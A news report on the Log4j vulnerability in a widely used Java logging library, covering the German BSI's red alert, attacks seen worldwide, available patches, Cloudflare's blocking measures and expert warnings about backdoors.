IT security experts are sounding the alarm about a vulnerability that is threatening servers across the network. The German Federal Office for Information Security (BSI) raised its alert level for the vulnerability from orange to red on Saturday. There have been attempts at attacks around the world, some of which have been successful, it said. "The extent of the threat cannot currently be conclusively determined."

The vulnerability is located in a widely used library for Java software. The vulnerability could allow attackers to execute their software code on the servers under certain circumstances. This could allow them to run their malicious programs there, for example. The vulnerability is limited to some versions of the library called Log4j. However, no one has a complete overview of where the vulnerable versions of Log4j are being used.

"It is not yet known in which products this library is used, which means that it is not yet possible to estimate which products are affected by the vulnerability," the BSI qualified. "If the manufacturers provide updates, these should be installed immediately," the agency recommended to service providers.

Log4j is a so-called logging library. It is used to record various events in server operation as in a logbook - for example, for later analysis of errors. The vulnerability can be activated simply by saving a specific character string in the log. This makes it rather easy to exploit, which has caused great concern among experts. The problem was discovered on Thursday on servers for the online game 'Minecraft'.

IT security companies and Java specialists worked over the weekend to patch the vulnerability. An update is now available for the affected versions of the open-source Log4j library. However, its protection only takes effect when service operators install it. The firewall specialist Cloudflare has therefore installed a mechanism for its customers to block attacks. Experts warned that not only online systems are at risk. A QR scanner or a contactless door lock, for example, could also be attacked if they used Java and Log4j, Cloudflare emphasized.

The IT security industry saw a race against online criminals, who for their part are automatically searching for vulnerable servers. "At the moment, the priority is to find out how widespread the problem really is," said Rüdiger Trost from IT security company F-Secure. "Unfortunately, not only security teams but also hackers are working overtime to find the answer. "Attackers could now also just use the gap to install inconspicuous backdoors for themselves, Trost warned. "The actual attacks will certainly only take place weeks or many months later."